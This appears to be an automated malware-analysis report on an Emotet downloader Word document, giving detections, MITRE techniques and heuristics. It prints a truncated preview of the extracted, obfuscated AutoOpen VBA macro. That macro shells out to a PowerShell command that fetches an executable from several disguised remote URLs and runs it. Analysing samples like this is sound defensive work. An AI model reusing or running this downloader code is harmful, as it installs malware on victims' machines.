MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6787868-0', strongly suggesting the Emotet family. The presence of an AutoOpen VBA macro indicates an attempt to automatically execute malicious code upon opening. The script's obfuscated nature and the 'Shell' command suggest it's designed to download and execute a secondary payload, a common Emotet tactic.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6787868-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6787868-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4330 bytes |
SHA-256: b3630eb3324ce0ec00cae2680b59d19c351eea8dfddbceab6e100eeef3597a22 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jisMDRw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim jujpOz()
ReDim jujpOz(4)
jujpOz(0) = 506070408
jujpOz(1) = 324
jujpOz(2) = 441
jujpOz(3) = 6
Dim CczCM()
ReDim CczCM(4)
CczCM(0) = 781
CczCM(1) = 9
CczCM(2) = 9150
CczCM(3) = 9
Dim qjzcp()
ReDim qjzcp(3)
qjzcp(0) = 469
qjzcp(1) = 776
qjzcp(2) = 74
Dim HoQjJA()
ReDim HoQjJA(4)
HoQjJA(0) = 1277
HoQjJA(1) = 89
HoQjJA(2) = 8403
HoQjJA(3) = 45
Dim SKwOn()
ReDim SKwOn(3)
SKwOn(0) = 447267940
SKwOn(1) = 154510115
SKwOn(2) = 123
Dim QiSWYD()
ReDim QiSWYD(2)
QiSWYD(0) = 7606
QiSWYD(1) = 33
Shell@ IJRCocJpHiG + ZSalkIYl + QKwcbvlm, Format(0)
Dim SNHvH()
ReDim SNHvH(5)
SNHvH(0) = 5
SNHvH(1) = 216725380
SNHvH(2) = 28
SNHvH(3) = 4292
SNHvH(4) = 34
Dim ikzjZ()
ReDim ikzjZ(2)
ikzjZ(0) = 4056
ikzjZ(1) = 49753595
Dim zDUZR()
ReDim zDUZR(3)
zDUZR(0) = 336113972
zDUZR(1) = 529
zDUZR(2) = 975
Dim zFdCv()
ReDim zFdCv(3)
zFdCv(0) = 7
zFdCv(1) = 381
zFdCv(2) = 2857
End Sub
Attribute VB_Name = "IDrCGYOVw"
Function IJRCocJpHiG()
On _
Error _
Resume _
Next
Dim Qcvzz()
ReDim Qcvzz(2)
Qcvzz(0) = 40
Qcvzz(1) = 4827
Dim mPCBMC()
ReDim mPCBMC(3)
mPCBMC(0) = 51599234
mPCBMC(1) = 2635
mPCBMC(2) = 207
YQvqa = Format(Chr(10 + 16 + 11 + 5 + 57)) + "md /V^:/" + Format(Chr(7 + 11 + 8 + 3 + 38)) + Format(Chr(3 + 5 + 3 + 1 + 22)) + "^s^e^t" + " ^XK^d=^ ^ ^ ^ ^ " + "^ ^ ^ " + " ^ ^ ^ }^}{h" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^t^a" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "}^;^" + "k^aerb;^F^zv^" + "$ m^e^t^I^" + "-^ek^ovn^I^;)" + "Fzv$^ ,S^BV$(eliFd^a^o^ln" + "w^o^D.^wV^B${^yr^t^{" + ")YRn^$ ni^ SBV^" + "$(^h" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^a^ero^f;^'^ex^e^.^'+^z^S" + "r^$^+^'"
Dim ICjTl()
ReDim ICjTl(4)
ICjTl(0) = 242176595
ICjTl(1) = 8309
ICjTl(2) = 486
ICjTl(3) = 91
Dim KjuCz()
ReDim KjuCz(2)
KjuCz(0) = 2230
KjuCz(1) = 927
Dim pBVEZ()
ReDim pBVEZ(4)
pBVEZ(0) = 3417
pBVEZ(1) = 1
pBVEZ(2) = 4
pBVEZ(3) = 12
iSAlzkwSbWo = "\'^+" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "il^bup:vn^e$=" + "Fzv^$^;'^7^9^7'" + "^ ^= ^z^Sr^$;)^'^@'(^til^pS." + "'n7^9^0^8^L/^m^o" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^.atin" + "^aw^gn" + "a^tn^e^t^l" + "^ek^i^tr^a//:ptt^h@P^Dky^3/^d" + "i.^be^w^.urab^le^kitr^ab^ew//" + "^:p^t^th^@^x^xYH" + "^sf/m^o" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^." + Format(Chr(10 + 16 + 11 + 5 + 57)) + "megka//^:^p" + "^t^th^@^i^gXm^F^8z2/mo" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^.l^l^i"
Dim ZHsZF()
ReDim ZHsZF(4)
ZHsZF(0) = 344686345
ZHsZF(1) = 91519779
ZHsZF(2) = 4715
ZHsZF(3) = 6
Dim ToiVKX()
ReDim ToiVKX(5)
ToiVKX(0) = 1485
ToiVKX(1) = 2913
ToiVKX(2) = 30
ToiVKX(3) = 9967
ToiVKX(4) = 5
Dim MOtwY()
ReDim MOtwY(3)
MOtwY(0) = 22
MOtwY(1) = 1602
MOtwY(2) = 91
Dim mXBPuz()
ReDim mXBPuz(5)
mXBPuz(0) = 3
mXBPuz(1) = 8077
mXBPuz(2) = 4
mXBPuz(3) = 793
mXBPuz(4) = 99
shGpbmnXn = "r^gto^ira^l//:" + "^p^t^t^h^@hpT^Or/^mo" + Format(Chr(10 + 16 + 11 + 5 + 57)) + ".^ss^er" + "d^d^a^ev^i^t" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^ep" + "s^w^en//^:p^t^th'=^Y" + "Rn$^;tnei^l" + Format(Chr(7 + 11 + 8 + 3 + 38)) + "^be^W.t^eN t" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "e^jb" + "^o-^wen=^wVB$^ lle^h^srew" + "^o^p&&^f^or /^L %^T ^in (3^" + "7^6^;-^1^;0)^d^" + "o ^se^t ^Q^S" + "l=!^Q^Sl" + "!!^XK^d:~%" + "^T,1!&&^i^f %^T=^=^0 " + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^a^ll"
Dim cfpJLs()
ReDim cfpJLs(3)
cfpJLs(0) = 29
cfpJLs(1) = 333202737
cfpJLs(2) = 6172
Dim KwhNF()
ReDim KwhNF(4)
KwhNF(0) = 857
KwhNF(1) = 9
KwhNF(2) = 9823
KwhNF(3) = 6439
Dim NjsvJp()
ReDim NjsvJp(3)
NjsvJp(0) = 7
NjsvJp(1) = 2123
NjsvJp(2) = 24
Dim frCGTv()
ReDim frCGTv(3)
frCGTv(0) = 62
frCGTv(1) = 9
frCGTv(2) = 38
pp
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.